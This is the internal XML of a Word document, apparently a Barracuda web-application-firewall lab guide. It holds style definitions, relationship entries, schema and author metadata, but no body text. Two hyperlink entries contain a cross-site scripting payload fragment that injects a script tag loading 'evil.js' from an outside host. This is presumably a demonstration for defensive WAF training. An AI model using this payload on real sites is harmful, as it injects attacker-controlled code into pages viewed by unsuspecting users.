      <w:color w:val="5A5A5A" w:themeColor="text1" w:themeTint="A5"/>
      <w:spacing w:val="15"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading1Char" w:customStyle="1">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="002F558A"/>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D01E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7D01EA"/>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7D01EA"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Quote">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="QuoteChar"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:rsid w:val="003B48A4"/>
    <w:pPr>
      <w:pBdr>
        <w:left w:val="single" w:color="auto" w:sz="4" w:space="4"/>
      </w:pBdr>
      <w:spacing w:before="200" w:after="160"/>
      <w:ind w:left="864" w:right="864"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="QuoteChar" w:customStyle="1">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="003B48A4"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0016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3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4298">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="50159962">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="458841338">
          <w:marLeft w:val="1800"/>
          <w:marRight w:val="1800"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="180755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46"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45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="rId5" /><Relationship Type="http://schemas.microsoft.com/office/2019/09/relationships/intelligence" Target="intelligence.xml" Id="R6881ba4d214f4dce" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item4.xml" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://barracuda.slack.com//xss-doc.appspot.com/static/evil.js';document.body.appendChild(s)" TargetMode="External" Id="Rf4c1ec01213d4458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://barracuda.slack.com//xss-doc.appspot.com/static/evil.js';document.body.appendChild(s)" TargetMode="External" Id="Rde27b4e763c549f4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://s3.amazonaws.com/nmiron-sko20-labs/pricelist.dat" TargetMode="External" Id="R3d80b65bb1f54258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://s3.amazonaws.com/nmiron-sko20-labs/pricelist.dat" TargetMode="External" Id="R418c1a5a642246bf" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2a.png" Id="R9b45880e11ea4910" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2b.png" Id="R131dd31e0fbd45d1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2c.png" Id="Rf27a53beaefb4654" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://waas.barracudanetworks.com/" TargetMode="External" Id="Rebca7047caee4b63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://campus.barracuda.com/product/WAAS/doc/77399164/getting-started/" TargetMode="External" Id="R2c1eb0c26333450e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2d.png" Id="R9fd3a6bf831b4afd" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2e.png" Id="R99c935537f0745b8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2f.png" Id="R90a7153b76bd4e19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image30.png" Id="Rd8441892a67a44b7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image31.png" Id="R9b861d97645e4031" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image32.png" Id="R7ecc3096cfb6487e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image33.png" Id="R01588b769bdd4f81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image34.png" Id="Rcd5fb62018154866" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image35.png" Id="Red91467077ad4b9d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image36.png" Id="R284f5890ccd448ca" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image37.png" Id="Rb955e330432b4a8e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image38.png" Id="R87d740f360624f7b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image39.png" Id="Ra4431f2c94124af5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3a.png" Id="Rda679b199975481d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3b.png" Id="R2d0d4ef6c34b4b43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3c.png" Id="R26a7e2d86e3b4952" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3d.png" Id="R222cfb16dfbb44c5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image67.png" Id="R8025c3153f9c4f2e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image68.png" Id="R4573d00858004707" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image69.png" Id="Rce99370dfbcb428f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image6a.png" Id="Rdeab6fa2ebde45b9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:julio.tan@gmail.com" TargetMode="External" Id="R1d4de15f60384ec5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image6b.png" Id="R3b35db91291249d7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image6c.png" Id="R3fadcfe898ab4eb5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:julio.tan@gmail.com" TargetMode="External" Id="R38943dc6517d43c9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image6d.png" Id="R3458950c2bb44710" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image6e.png" Id="R1afc470ec1f24721" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image6f.png" Id="R6a4ac91181af45d4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image70.png" Id="R6e6c12bc17394c2b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image71.png" Id="R1e6588506fee4c7d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image72.png" Id="R254953f56a2347fe" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image73.png" Id="R5a5cc1a3dbd742ea" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image74.png" Id="R1d8d4b74806448e5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image75.png" Id="R7c7f727466ae4fce" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image76.png" Id="R0550922467164104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image77.png" Id="Rab41e9591dbf42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7fccbc4-b1de-4cd0-b913-725fd0ffe0a5">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8DB6DB9E9A5A4CB3BEAE51B1DE4187" ma:contentTypeVersion="7" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="0da9c1eaea58ae361eccb4907a745191">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="cc031a03-b3ee-448c-89ec-a9dba7248368" xmlns:ns3="a7fccbc4-b1de-4cd0-b913-725fd0ffe0a5" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="03db77f640f581852e3b2f66b2a1fb88" ns2:_="" ns3:_="">
    <xsd:import namespace="cc031a03-b3ee-448c-89ec-a9dba7248368"/>
    <xsd:import namespace="a7fccbc4-b1de-4cd0-b913-725fd0ffe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1a03-b3ee-448c-89ec-a9dba7248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fccbc4-b1de-4cd0-b913-725fd0ffe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A9514-F76F-4911-BCAF-8AED2A84E645}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{3410CA25-C91B-4F5B-87E9-9CB6F8B36B88}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{3F1A5075-8B51-4648-B94A-AD7AB81C48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73A741-DC12-409D-B54C-E20BD10F88E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yu Zhang</dc:creator>
  <keywords/>
  <dc:description/>
  <lastModifiedBy>Brett Wolmarans</lastModifiedBy>
  <revision>36</revision>
  <lastPrinted>2021-04-23T05:39:00.0000000Z</lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-04-23T14:14:00.0000000Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-03T03:38:27.91624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B6DB9E9A5A4CB3BEAE51B1DE4187</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y fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="_ExtendedDescription">
    <vt:lpwstr/>
  </property>
</Properties>
</file>